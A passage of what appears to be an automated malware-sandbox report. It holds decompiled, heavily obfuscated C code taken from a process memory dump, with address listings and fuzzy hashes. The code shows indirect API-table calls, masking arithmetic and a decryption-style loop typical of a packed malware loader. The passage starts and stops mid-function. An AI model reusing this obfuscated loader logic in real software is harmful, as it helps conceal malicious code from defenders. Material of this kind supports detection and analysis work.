                  				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) & 0x00000000;
                  				 *(_t422 + 0x41c00b) =  *(_t422 + 0x41c00b) | _t476 ^  *_t580 | _t356;
                  				_t479 = _t476;
                  				 *_t580 =  *_t580 - _t497;
                  				 *_t580 = _t422 + 0x41c333;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t580 =  *_t580 | _t422 + 0x0041c5ab;
                  				_t359 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12, _t497);
                  				 *_t580 = _t359;
                  				 *_t580 =  *_t580 - _t535;
                  				 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
                  				_t361 =  *((intOrPtr*)(_t422 + 0x41f060))(_v12);
                  				 *_t117 = _t535;
                  				_t432 = _v16;
                  				 *_t119 = _t361;
                  				_v16 = _v16 + _t432;
                  				_push(_v16);
                  				_pop(_t362);
                  				_t499 = _t497;
                  				_v12 = _t499;
                  				_t434 = _t432 & 0x00000000 | _t499 ^ _v12 ^  *(_t422 + 0x41ce17);
                  				_t502 = _v12;
                  				if(_t434 > _t362) {
                  					 *_t580 = _t422 + 0x41c5ab;
                  					_v20 = 0;
                  					 *_t580 =  *_t580 | _t422 + 0x0041cfa2;
                  					_t418 =  *((intOrPtr*)(_t422 + 0x41f064))(_v20, _v16);
                  					_v20 = _t502;
                  					 *(_t422 + 0x41cc6a) = 0 ^ _t418;
                  					_t502 = _v20;
                  				}
                  				_pop( *_t136);
                  				 *_t580 = 0 ^ _v16;
                  				 *_t580 =  *_t580 - _t535;
                  				 *_t580 =  *_t580 + _t422 + 0x41d2cb;
                  				 *_t580 =  *_t580 & 0x00000000;
                  				 *_t580 =  *_t580 | _t422 + 0x0041d0da;
                  				_t367 =  *((intOrPtr*)(_t422 + 0x41f068))(_t422, _t535, _v16);
                  				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) & 0x00000000;
                  				 *(_t422 + 0x41c44e) =  *(_t422 + 0x41c44e) | _t434 & 0x00000000 | _t367;
                  				_t437 = _t434;
                  				_t368 =  *((intOrPtr*)(_t422 + 0x41f060))();
                  				 *_t580 = _t368;
                  				_v16 = 0;
                  				 *_t580 =  *_t580 ^ _t422 + 0x0041d2e3;
                  				_t370 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16, _v12);
                  				_v16 = 0;
                  				 *_t580 =  *_t580 ^ _t370;
                  				 *_t580 =  *_t580 & 0x00000000;
                  				 *_t580 =  *_t580 ^ _t422 + 0x0041cf21;
                  				_t372 =  *((intOrPtr*)(_t422 + 0x41f060))(_v16);
                  				 *_t156 = _t569;
                  				_t439 = (_t437 & 0x00000000) + _v20;
                  				 *_t158 = _t372;
                  				_v12 = _v12 + _t439;
                  				_push(_v12);
                  				_pop(_t373);
                  				_t424 = _t422;
                  				_v20 = _t479;
                  				_t441 = _t439 & 0x00000000 | _t479 & 0x00000000 |  *(_t424 + 0x41d124);
                  				_t482 = _v20;
                  				if(_t441 > _t373) {
                  					_t165 = _t424 + 0x41d2e3; // 0x41d2e3
                  					 *_t580 =  *_t580 & 0x00000000;
                  					 *_t580 =  *_t580 | _t165;
                  					_t166 = _t424 + 0x41cf21; // 0x41cf21
                  					 *_t580 = _t166;
                  					_t415 =  *((intOrPtr*)(_t424 + 0x41f064))(_v20, _t482);
                  					_v12 = _t441;
                  					 *(_t424 + 0x41c275) = 0 ^ _t415;
                  					_t441 = _v12;
                  				}
                  				_pop( *_t172);
                  				_v12 = _v12 & 0x00000000;
                  				 *_t580 =  *_t580 ^ _v16;
                  				_t177 = _t424 + 0x41c5c8; // 0x41c5c8
                  				_v16 = _v16 & 0x00000000;
                  				 *_t580 =  *_t580 | _t177;
                  				_t377 =  *((intOrPtr*)(_t424 + 0x41f060))(_v16, _v12);
                  				_t581 =  &(_t580[1]);
                  				 *_t182 = _t377;
                  				_v20 = _v20 + (_t441 & 0x00000000 ^  *_t580);
                  				_push(_v20);
                  				_pop(_t378);
                  				_t537 = _t535;
                  				 *_t581 = _t537;
                  				_t444 = 0 ^  *(_t424 + 0x41c106);
                  				_t540 = 0;
                  				if(_t444 > _t378) {
                  					_t187 = _t424 + 0x41c333; // 0x41c333
                  					_v12 = 0;
                  					 *_t581 =  *_t581 | _t187;
                  					_t190 = _t424 + 0x41c5c8; // 0x41c5c8
                  					 *_t581 =  *_t581 ^ _t444;
                  					 *_t581 = _t190;
                  					_t378 =  *((intOrPtr*)(_t424 + 0x41f064))(_t444, _v12);
                  				}
                  				_v16 = _t540;
                  				 *((intOrPtr*)(_t424 + 0x41c594)) = _t378;
                  				_t543 = _v16;
                  				_t446 = _t444 & 0x00000000 ^ (_t424 ^  *_t581 | _a4);
                  				_t427 = _t424;
                  				_v12 = 0;
                  				 *_t581 =  *_t581 + _t446;
                  				_t198 = _t427 + 0x41ccb8; // 0x41ccb8
                  				_v12 = 0;
                  				 *_t581 =  *_t581 | _t198;
                  				_t380 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _v12);
                  				_v20 = _t446;
                  				 *((intOrPtr*)(_t427 + 0x41cb42)) = _t380;
                  				_pop( *_t205);
                  				_t504 = _t502 & 0x00000000 | _t482 -  *_t581 | _v16;
                  				_t485 = _t482;
                  				_t207 = _t427 + 0x41d2a5; // 0x41d2a5
                  				 *_t581 =  *_t581 ^ _t504;
                  				 *_t581 =  *_t581 ^ _t207;
                  				_t382 =  *((intOrPtr*)(_t427 + 0x41f060))(_t504);
                  				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) & 0x00000000;
                  				 *(_t427 + 0x41cba6) =  *(_t427 + 0x41cba6) | _t504 & 0x00000000 ^ _t382;
                  				_t507 = _t504;
                  				_t572 = _t569;
                  				_t213 = _t427 + 0x41c4f4; // 0x41c4f4
                  				_v16 = _v16 & 0x00000000;
                  				 *_t581 =  *_t581 | _t213;
                  				_t217 = _t427 + 0x41c4e9; // 0x41c4e9
                  				 *_t581 =  *_t581 ^ _t485;
                  				 *_t581 = _t217;
                  				_t385 =  *((intOrPtr*)(_t427 + 0x41f068))(_t485, _v16);
                  				_v12 = _t543;
                  				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) & 0x00000000;
                  				 *(_t427 + 0x41cc3a) =  *(_t427 + 0x41cc3a) ^ (_t543 ^ _v12 | _t385);
                  				_t546 = _v12;
                  				_v16 = _t485;
                  				_v8 = _t507;
                  				_t229 = _t427 + 0x41c0f6; // 0x41c0f6
                  				 *_t581 = _t229;
                  				_t387 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20);
                  				 *_t581 = _t387;
                  				_t233 = _t427 + 0x41c3d8; // 0x41c3d8
                  				_v20 = _v20 & 0x00000000;
                  				 *_t581 =  *_t581 ^ _t233;
                  				_t389 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _v12);
                  				_t453 =  *_t581;
                  				_t582 =  &(_t581[1]);
                  				 *_t582 =  *_t582 + _v16;
                  				_t489 = _t389;
                  				_t390 = _t489 + _t453;
                  				_t491 = 0;
                  				_t455 = _t453 & 0x00000000 ^ _t507 -  *_t582 ^  *(_t427 + 0x41ce7d);
                  				_t510 = _t507;
                  				if(_t455 > _t390) {
                  					_t239 = _t427 + 0x41c0f6; // 0x41c0f6
                  					_v12 = 0;
                  					 *_t582 =  *_t582 ^ _t239;
                  					_t242 = _t427 + 0x41c3d8; // 0x41c3d8
                  					 *_t582 =  *_t582 & 0x00000000;
                  					 *_t582 =  *_t582 + _t242;
                  					_t390 =  *((intOrPtr*)(_t427 + 0x41f064))(_t491, _v12);
                  				}
                  				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) & 0x00000000;
                  				 *(_t427 + 0x41cf5f) =  *(_t427 + 0x41cf5f) | _t546 ^  *_t582 | _t390;
                  				_t549 = _t546;
                  				_t248 = _t427 + 0x41c2c4; // 0x41c2c4
                  				_v12 = 0;
                  				 *_t582 =  *_t582 | _t248;
                  				_t392 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, 0);
                  				_v12 = _t510;
                  				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) & 0x00000000;
                  				 *(_t427 + 0x41c193) =  *(_t427 + 0x41c193) | _t510 - _v12 ^ _t392;
                  				_t513 = _v12;
                  				 *((intOrPtr*)(_t427 + 0x41f080))();
                  				 *_t582 =  *_t582 & 0x00000000;
                  				 *_t582 =  *_t582 ^ _t455;
                  				_t260 = _t427 + 0x41d1a0; // 0x41d1a0
                  				_v12 = _v12 & 0x00000000;
                  				 *_t582 =  *_t582 ^ _t260;
                  				_t395 =  *((intOrPtr*)(_t427 + 0x41f060))(_v12, _t572);
                  				_v12 = _t491;
                  				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) & 0x00000000;
                  				 *(_t427 + 0x41c59c) =  *(_t427 + 0x41c59c) | _t491 - _v12 | _t395;
                  				_t494 = _v12;
                  				_pop( *_t272);
                  				_t456 = _v20;
                  				do {
                  					_v8 = _v8 - 1;
                  					 *_t582 =  *_t582 & 0x00000000;
                  					 *_t582 =  *_t582 + _t456;
                  					_t276 = _t427 + 0x41ccae; // 0x41ccae
                  					_v20 = 0;
                  					 *_t582 =  *_t582 + _t276;
                  					_t397 =  *((intOrPtr*)(_t427 + 0x41f060))(_v20, _t572);
                  					_v16 = _v16 & 0x00000000;
                  					 *_t582 =  *_t582 + _t397;
                  					_t283 = _t427 + 0x41c045; // 0x41c045
                  					 *_t582 = _t283;
                  					_t399 =  *((intOrPtr*)(_t427 + 0x41f060))(_v16, _v16);
                  					_pop( *_t286);
                  					_t457 = _v20;
                  					_v12 = _t549;
                  					_push(_t457 + _t399);
                  					_t552 = _v12;
                  					_pop(_t400);
                  					_t572 = _t572;
                  					if((_t457 & 0x00000000 | _t572 & 0x00000000 ^  *(_t427 + 0x41c40d)) > _t400) {
                  						_t291 = _t427 + 0x41ccae; // 0x41ccae
                  						_v12 = _v12 & 0x00000000;
                  						 *_t582 =  *_t582 | _t291;
                  						_t295 = _t427 + 0x41c045; // 0x41c045
                  						_v12 = 0;
                  						 *_t582 =  *_t582 ^ _t295;
                  						_t400 =  *((intOrPtr*)(_t427 + 0x41f064))(_v12, _v12);
                  						_v16 = _t552;
                  						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) & 0x00000000;
                  						 *(_t427 + 0x41d2c3) =  *(_t427 + 0x41d2c3) | _t552 & 0x00000000 ^ _t400;
                  						_t552 = _v16;
                  					}
                  					_t461 =  *_t582;
                  					_t583 =  &(_t582[1]);
                  					_v20 = _t552;
                  					_v12 = _v20;
                  					_t516 = _a4 + (_t513 & 0x00000000 ^ (_t552 & 0x00000000 | _t461));
                  					_v20 = _v20 & 0x00000000;
                  					_push(_v20);
                  					 *_t583 =  *_t583 | _t461;
                  					_v16 = _t400;
                  					_push(_a8 + _t516 + 1);
                  					_pop(_t518);
                  					_push(_v12);
                  					_pop(_t561);
                  					 *((intOrPtr*)(_t427 + 0x41f0c0))();
                  					_t549 =  *_t583;
                  					 *_t583 = _v8;
                  					 *_t583 =  *_t583 & 0x00000000;
                  					 *_t583 =  *_t583 + (_t518 | _a4) + 1;
                  					_t513 =  *_t583;
                  					 *_t583 = _a8;
                  					E030531B3(_t427, _t494, _t513, _t549, (_t518 | _a4) + 1, _t572, _t561);
                  					_t456 =  *_t583;
                  					_t582 = _t583 - 0xfffffffc;
                  				} while (_v8 != 0);
                  				_pop( *_t323);
                  				return 0;
                  			}


































































































                  0x03051cd0
                  0x03051cd0
                  0x03051cd0
                  0x03051cd1
                  0x03051cd5
                  0x03051cd8
                  0x03051cda
                  0x03051ce3
                  0x03051cea
                  0x03051ced
                  0x03051cf0
                  0x03051cf6
                  0x03051cfc
                  0x03051d03
                  0x03051d09
                  0x03051d10
                  0x03051d11
                  0x03051d15
                  0x03051d1e
                  0x03051d21
                  0x03051d24
                  0x03051d2a
                  0x03051d2b
                  0x03051d2e
                  0x03051d37
                  0x03051d38
                  0x03051d3b
                  0x03051d3e
                  0x03051d4a
                  0x03051d50
                  0x03051d54
                  0x03051d57
                  0x03051d5a
                  0x03051d5d
                  0x03051d5e
                  0x03051d5f
                  0x03051d65
                  0x03051d68
                  0x03051d6b
                  0x03051d6e
                  0x03051d76
                  0x03051d7d
                  0x03051d80
                  0x03051d89
                  0x03051d8c
                  0x03051d8f
                  0x03051d95
                  0x03051d9c
                  0x03051da2
                  0x03051da2
                  0x03051daa
                  0x03051dae
                  0x03051db2
                  0x03051dbb
                  0x03051dc5
                  0x03051dc8
                  0x03051dce
                  0x03051dd5
                  0x03051ddb
                  0x03051de5
                  0x03051de9
                  0x03051df3
                  0x03051df6
                  0x03051df9
                  0x03051dff
                  0x03051e07
                  0x03051e0e
                  0x03051e14
                  0x03051e20
                  0x03051e23
                  0x03051e2d
                  0x03051e36
                  0x03051e3d
                  0x03051e46
                  0x03051e50
                  0x03051e53
                  0x03051e59
                  0x03051e61
                  0x03051e68
                  0x03051e6e
                  0x03051e71
                  0x03051e7a
                  0x03051e83
                  0x03051e8a
                  0x03051e93
                  0x03051e9a
                  0x03051e9d
                  0x03051ea3
                  0x03051eab
                  0x03051eb2
                  0x03051ec0
                  0x03051ec9
                  0x03051ed0
                  0x03051ed6
                  0x03051edd
                  0x03051ee4
                  0x03051eed
                  0x03051ef7
                  0x03051efa
                  0x03051f00
                  0x03051f07
                  0x03051f0d
                  0x03051f13
                  0x03051f1f
                  0x03051f2b
                  0x03051f2e
                  0x03051f3a
                  0x03051f41
                  0x03051f47
                  0x03051f4f
                  0x03051f52
                  0x03051f5b
                  0x03051f62
                  0x03051f65
                  0x03051f6e
                  0x03051f78
                  0x03051f7b
                  0x03051f7e
                  0x03051f84
                  0x03051f87
                  0x03051f8e
                  0x03051f91
                  0x03051f94
                  0x03051f97
                  0x03051f98
                  0x03051f99
                  0x03051fa8
                  0x03051faa
                  0x03051faf
                  0x03051fba
                  0x03051fc3
                  0x03051fcd
                  0x03051fd0
                  0x03051fd6
                  0x03051fdd
                  0x03051fe3
                  0x03051fe3
                  0x03051fe8
                  0x03051ff1
                  0x03051ffb
                  0x03051ffe
                  0x03052008
                  0x0305200c
                  0x0305200f
                  0x0305201b
                  0x03052022
                  0x03052028
                  0x03052029
                  0x03052032
                  0x0305203b
                  0x03052045
                  0x03052048
                  0x0305204e
                  0x03052058
                  0x03052062
                  0x03052066
                  0x03052069
                  0x03052075
                  0x03052078
                  0x0305207f
                  0x03052082
                  0x03052085
                  0x03052088
                  0x03052089
                  0x0305208a
                  0x03052099
                  0x0305209b
                  0x030520a0
                  0x030520a2
                  0x030520a9
                  0x030520ad
                  0x030520b0
                  0x030520b9
                  0x030520bc
                  0x030520c2
                  0x030520c9
                  0x030520cf
                  0x030520cf
                  0x030520d4
                  0x030520da
                  0x030520e1
                  0x030520e4
                  0x030520ea
                  0x030520f1
                  0x030520f4
                  0x03052103
                  0x0305210a
                  0x0305210d
                  0x03052110
                  0x03052113
                  0x03052114
                  0x03052117
                  0x03052122
                  0x03052124
                  0x03052127
                  0x03052129
                  0x0305212f
                  0x03052139
                  0x0305213c
                  0x03052143
                  0x03052146
                  0x03052149
                  0x03052149
                  0x0305214f
                  0x03052156
                  0x0305215c
                  0x03052169
                  0x0305216b
                  0x0305216c
                  0x03052176
                  0x03052179
                  0x0305217f
                  0x03052189
                  0x0305218c
                  0x03052192
                  0x03052199
                  0x030521a2
                  0x030521b1
                  0x030521b3
                  0x030521b4
                  0x030521bb
                  0x030521be
                  0x030521c1
                  0x030521cd
                  0x030521d4
                  0x030521da
                  0x030521e2
                  0x030521e3
                  0x030521e9
                  0x030521f0
                  0x030521f3
                  0x030521fa
                  0x030521fd
                  0x03052200
                  0x03052206
                  0x0305220e
                  0x03052215
                  0x0305221b
                  0x0305221e
                  0x03052225
                  0x0305222b
                  0x03052234
                  0x03052237
                  0x03052240
                  0x03052243
                  0x03052249
                  0x03052250
                  0x03052253
                  0x0305225b
                  0x0305225e
                  0x03052263
                  0x03052267
                  0x0305226a
                  0x0305226c
                  0x0305227a
                  0x0305227c
                  0x0305227f
                  0x03052281
                  0x03052287
                  0x03052291
                  0x03052294
                  0x0305229b
                  0x0305229f
                  0x030522a2
                  0x030522a2
                  0x030522ae
                  0x030522b5
                  0x030522bb
                  0x030522be
                  0x030522c4
                  0x030522ce
                  0x030522d1
                  0x030522d7
                  0x030522df
                  0x030522e6
                  0x030522ec
                  0x030522ef
                  0x030522f6
                  0x030522fa
                  0x030522fd
                  0x03052303
                  0x0305230a
                  0x0305230d
                  0x03052313
                  0x0305231b
                  0x03052322
                  0x03052328
                  0x0305232b
                  0x0305232e
                  0x03052331
                  0x03052331
                  0x03052335
                  0x03052339
                  0x0305233c
                  0x03052342
                  0x0305234c
                  0x0305234f
                  0x03052355
                  0x0305235c
                  0x0305235f
                  0x03052368
                  0x0305236b
                  0x03052371
                  0x03052374
                  0x03052377
                  0x0305237e
                  0x0305237f
                  0x03052382
                  0x03052392
                  0x03052395
                  0x03052397
                  0x0305239d
                  0x030523a4
                  0x030523a7
                  0x030523ad
                  0x030523b7
                  0x030523ba
                  0x030523c0
                  0x030523c8
                  0x030523cf
                  0x030523d5
                  0x030523d5
                  0x030523da
                  0x030523dd
                  0x030523e0
                  0x030523f0
                  0x030523fc
                  0x030523fe
                  0x03052402
                  0x03052405
                  0x03052408
                  0x03052410
                  0x03052414
                  0x03052415
                  0x0305241d
                  0x0305241f
                  0x03052429
                  0x03052429
                  0x0305242d
                  0x03052431
                  0x03052438
                  0x03052438
                  0x0305243b
                  0x03052442
                  0x03052445
                  0x03052448
                  0x0305245d
                  0x03052464

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
                  • Instruction ID: b8c19e22d79be6b2498dcc3333730498910c7851249bab68a908dd1a95cb30a2
                  • Opcode Fuzzy Hash: 39d30f7688323fef24dea233773f5addaff03df6641283267fa772f8f98102af
                  • Instruction Fuzzy Hash: A7420572C44218EFEF049FA0C8897EEBBF5FF48321F0544AAD899AA145D7345264CF69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E030543D8(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
                  				void* _t202;
                  				void* _t204;
                  				signed int _t205;
                  				signed int _t210;
                  				void* _t212;
                  				void* _t213;
                  				signed int _t217;
                  				signed int _t220;
                  				signed int _t223;
                  				signed int _t228;
                  				void* _t230;
                  				void* _t232;
                  				intOrPtr _t233;
                  				void _t236;
                  				signed int _t240;
                  				intOrPtr _t246;
                  				signed int _t251;
                  				signed int _t253;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t266;
                  				signed int _t274;
                  				signed int _t276;
                  				signed int _t278;
                  				signed int _t280;
                  				signed int _t283;
                  				void* _t286;
                  				signed int _t293;
                  				signed int _t294;
                  				signed int _t305;
                  				signed int _t306;
                  				signed int _t311;
                  				signed int _t314;
                  				signed int _t316;
                  				signed int _t318;
                  				signed int _t320;
                  				signed int _t323;
                  				signed int _t326;
                  				signed int _t330;
                  				signed int _t334;
                  				signed int _t337;
                  				signed int _t340;
                  				signed int _t343;
                  				void* _t348;
                  				signed int _t355;
                  				signed int _t358;
                  				signed int _t363;
                  				void* _t364;
                  				signed int _t366;
                  				signed int _t369;
                  				signed int* _t370;
                  				signed int* _t371;
                  				signed int* _t372;
                  				signed int* _t373;
                  				signed int* _t374;
                  				signed int* _t375;
                  				signed int* _t376;
                  				signed int* _t377;
                  
                  				_t355 = __esi;
                  				_t337 = __edi;
                  				 *_t370 =  *_t370 - _t366;
                  				 *_t370 = __ebx + 0x41c5e4;
                  				_t202 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				 *(_t366 - 0x1c) = 0;
                  				_push( *(_t366 - 0x1c));
                  				 *_t370 =  *_t370 + _t202;
                  				_push(__edi);
                  				 *_t370 =  *_t370 ^ __edi;
                  				 *_t370 =  *_t370 | __ebx + 0x0041c129;
                  				_t204 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_t274 = (__ecx & 0x00000000) +  *_t370;
                  				_t371 = _t370 - 0xfffffffc;
                  				 *(_t366 - 0x1c) = __ebx;
                  				_push(_t274 + _t204);
                  				_t261 =  *(_t366 - 0x1c);
                  				_pop(_t205);
                  				_push(__edx);
                  				_t276 = _t274 & 0x00000000 | __edx ^  *_t371 |  *(_t261 + 0x41c62b);
                  				_pop(_t305);
                  				if(_t276 > _t205) {
                  					 *_t371 =  *_t371 & 0x00000000;
                  					 *_t371 =  *_t371 ^ _t261 + 0x0041c5e4;
                  					 *_t371 =  *_t371 & 0x00000000;
                  					 *_t371 =  *_t371 + _t261 + 0x41c129;
                  					_t205 =  *((intOrPtr*)(_t261 + 0x41f064))(_t366, __esi);
                  				}
                  				 *_t371 = _t355;
                  				 *(_t261 + 0x41d040) = 0 ^ _t205;
                  				_t358 = 0;
                  				if( *((intOrPtr*)(_t366 - 0x10)) == 4) {
                  					_t15 = _t261 + 0x41d1be; // 0x41d1be
                  					 *_t371 = _t15;
                  					_t17 = _t261 + 0x41c0a8; // 0x41c0a8
                  					 *_t371 =  *_t371 & 0x00000000;
                  					 *_t371 =  *_t371 ^ _t17;
                  					_push( *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24)));
                  					_pop( *_t19);
                  					_push( *(_t366 - 0x20));
                  					_pop( *_t21);
                  					 *((intOrPtr*)(_t366 - 8)) = 1;
                  					_t23 = _t261 + 0x41c6f8; // 0x41c6f8
                  					 *(_t366 - 0x20) =  *(_t366 - 0x20) & 0x00000000;
                  					 *_t371 =  *_t371 ^ _t23;
                  					_t251 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x20));
                  					 *(_t366 - 0x20) = _t305;
                  					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) & 0x00000000;
                  					 *(_t261 + 0x41c674) =  *(_t261 + 0x41c674) | _t305 ^  *(_t366 - 0x20) | _t251;
                  					_t334 =  *(_t366 - 0x20);
                  					 *((intOrPtr*)(_t366 - 0xc)) = 0x55;
                  					_t36 = _t261 + 0x41c356; // 0x41c356
                  					 *(_t366 - 0x1c) =  *(_t366 - 0x1c) & 0x00000000;
                  					 *_t371 =  *_t371 | _t36;
                  					_t253 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x1c));
                  					 *(_t366 - 0x24) = _t337;
                  					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) & 0x00000000;
                  					 *(_t261 + 0x41cd7d) =  *(_t261 + 0x41cd7d) | _t337 & 0x00000000 ^ _t253;
                  					_t337 =  *(_t366 - 0x24);
                  					 *((intOrPtr*)(_t366 - 0x18)) = 2;
                  					_t48 = _t261 + 0x41cc3e; // 0x41cc3e
                  					 *(_t366 - 0x24) =  *(_t366 - 0x24) & 0x00000000;
                  					 *_t371 =  *_t371 ^ _t48;
                  					_t52 = _t261 + 0x41cf5b; // 0x41cf5b
                  					 *_t371 =  *_t371 ^ _t358;
                  					 *_t371 = _t52;
                  					_t205 =  *((intOrPtr*)(_t261 + 0x41f068))(_t358,  *(_t366 - 0x24));
                  					 *(_t366 - 0x20) = _t334;
                  					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) & 0x00000000;
                  					 *(_t261 + 0x41c1cd) =  *(_t261 + 0x41c1cd) | _t334 & 0x00000000 | _t205;
                  					_t305 =  *(_t366 - 0x20);
                  				}
                  				_t306 = _t305 ^ _t305;
                  				 *_t371 =  *_t371 - _t337;
                  				 *_t371 = _t306;
                  				_t60 = _t261 + 0x41c61d; // 0x41c61d
                  				 *_t371 =  *_t371 ^ _t358;
                  				 *_t371 = _t60;
                  				_t210 =  *((intOrPtr*)(_t261 + 0x41f060))(_t358, _t337, _t205);
                  				 *_t371 = _t210;
                  				_t63 = _t261 + 0x41cf67; // 0x41cf67
                  				 *(_t366 - 0x24) = 0;
                  				 *_t371 =  *_t371 ^ _t63;
                  				_t212 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t366 - 0x24),  *(_t366 - 0x1c));
                  				_pop( *_t67);
                  				_t278 = _t276 & 0x00000000 ^  *(_t366 - 0x24);
                  				 *(_t366 - 0x24) = _t337;
                  				_push(_t278 + _t212);
                  				_t340 =  *(_t366 - 0x24);
                  				_pop(_t213);
                  				_t280 = _t278 & 0x00000000 | _t366 & 0x00000000 ^  *(_t261 + 0x41c5dc);
                  				_t369 = _t366;
                  				if(_t280 > _t213) {
                  					_t72 = _t261 + 0x41c61d; // 0x41c61d
                  					 *(_t369 - 0x1c) = 0;
                  					 *_t371 =  *_t371 ^ _t72;
                  					_t75 = _t261 + 0x41cf67; // 0x41cf67
                  					 *(_t369 - 0x20) = 0;
                  					 *_t371 =  *_t371 | _t75;
                  					_t246 =  *((intOrPtr*)(_t261 + 0x41f064))( *(_t369 - 0x20),  *(_t369 - 0x1c));
                  					 *(_t369 - 0x1c) = _t280;
                  					 *((intOrPtr*)(_t261 + 0x41cf4f)) = _t246;
                  					_t280 =  *(_t369 - 0x1c);
                  				}
                  				_t372 =  &(_t371[1]);
                  				 *_t372 = _t280;
                  				_t283 = 0;
                  				 *_t372 = _t306 & 0x00000000 |  *_t371;
                  				_t84 = _t261 + 0x41cef6; // 0x41cef6
                  				 *(_t369 - 0x1c) =  *(_t369 - 0x1c) & 0x00000000;
                  				 *_t372 =  *_t372 | _t84;
                  				_t88 = _t261 + 0x41ceb9; // 0x41ceb9
                  				 *_t372 =  *_t372 ^ _t369;
                  				 *_t372 =  *_t372 ^ _t88;
                  				_t217 =  *((intOrPtr*)(_t261 + 0x41f068))(_t369,  *(_t369 - 0x1c),  *(_t369 - 0x24));
                  				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) & 0x00000000;
                  				 *(_t261 + 0x41caf5) =  *(_t261 + 0x41caf5) | _t283 ^  *_t372 | _t217;
                  				_t286 = _t283;
                  				_t373 = _t372 - 0xfffffffc;
                  				_t311 = _t217 %  *(_t369 - 0x18);
                  				 *_t373 =  *_t373 & 0x00000000;
                  				 *_t373 =  *_t373 | _t311;
                  				_t100 = _t261 + 0x41c52d; // 0x41c52d
                  				 *(_t369 - 0x24) = 0;
                  				 *_t373 =  *_t373 ^ _t100;
                  				_t220 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24), _t286);
                  				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) & 0x00000000;
                  				 *(_t261 + 0x41d106) =  *(_t261 + 0x41d106) | _t311 & 0x00000000 | _t220;
                  				_t314 = _t311;
                  				_t316 = _t314 & 0x00000000 ^  *_t373;
                  				_t374 = _t373 - 0xfffffffc;
                  				 *((intOrPtr*)(_t369 - 4)) =  *((intOrPtr*)(_t369 - 4)) - _t316;
                  				 *(_t369 - 0x24) = 0;
                  				 *_t374 =  *_t374 | _t316;
                  				_t112 = _t261 + 0x41c7ee; // 0x41c7ee
                  				 *_t374 =  *_t374 ^ _t340;
                  				 *_t374 =  *_t374 ^ _t112;
                  				_t113 = _t261 + 0x41c513; // 0x41c513
                  				 *(_t369 - 0x20) = 0;
                  				 *_t374 =  *_t374 | _t113;
                  				_t223 =  *((intOrPtr*)(_t261 + 0x41f068))( *(_t369 - 0x20), _t340,  *(_t369 - 0x24), _t286);
                  				 *(_t369 - 0x20) = _t358;
                  				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) & 0x00000000;
                  				 *(_t261 + 0x41c2a8) =  *(_t261 + 0x41c2a8) ^ _t358 & 0x00000000 ^ _t223;
                  				_t318 =  *_t374;
                  				_t375 =  &(_t374[1]);
                  				 *(_t369 - 0x1c) = _t223;
                  				 *(_t369 - 0x14) =  *(_t369 - 0x14) & 0x00000000;
                  				 *(_t369 - 0x14) =  *(_t369 - 0x14) | _t223 ^  *(_t369 - 0x1c) ^ _t318;
                  				_t130 = _t261 + 0x41ccc7; // 0x41ccc7
                  				 *(_t369 - 0x24) = 0;
                  				 *_t375 =  *_t375 | _t130;
                  				_t228 =  *((intOrPtr*)(_t261 + 0x41f060))( *(_t369 - 0x24));
                  				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) & 0x00000000;
                  				 *(_t261 + 0x41cca4) =  *(_t261 + 0x41cca4) | _t340 -  *_t375 | _t228;
                  				_t343 = _t340;
                  				_t363 =  *(_t369 - 0x20) & 0x00000000 ^ _t261 & 0x00000000 ^  *(_t369 + 8);
                  				_t264 = _t261;
                  				_t139 = _t264 + 0x41c550; // 0x41c550
                  				 *(_t369 - 0x20) = 0;
                  				 *_t375 =  *_t375 + _t139;
                  				_t230 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20));
                  				 *(_t369 - 0x20) = 0;
                  				 *_t375 =  *_t375 + _t230;
                  				_t145 = _t264 + 0x41d34c; // 0x41d34c
                  				 *_t375 = _t145;
                  				_t232 =  *((intOrPtr*)(_t264 + 0x41f060))( *(_t369 - 0x20),  *(_t369 - 0x20));
                  				_t376 = _t375 - 0xfffffffc;
                  				 *_t148 = _t232;
                  				 *(_t369 - 0x24) =  *(_t369 - 0x24) + (0 ^  *_t375);
                  				_push( *(_t369 - 0x24));
                  				_pop(_t233);
                  				_t320 = _t318;
                  				 *(_t369 - 0x1c) = _t320;
                  				_t323 =  *(_t369 - 0x1c);
                  				if( *((intOrPtr*)(_t264 + 0x41ccf8)) > _t233) {
                  					_t155 = _t264 + 0x41c550; // 0x41c550
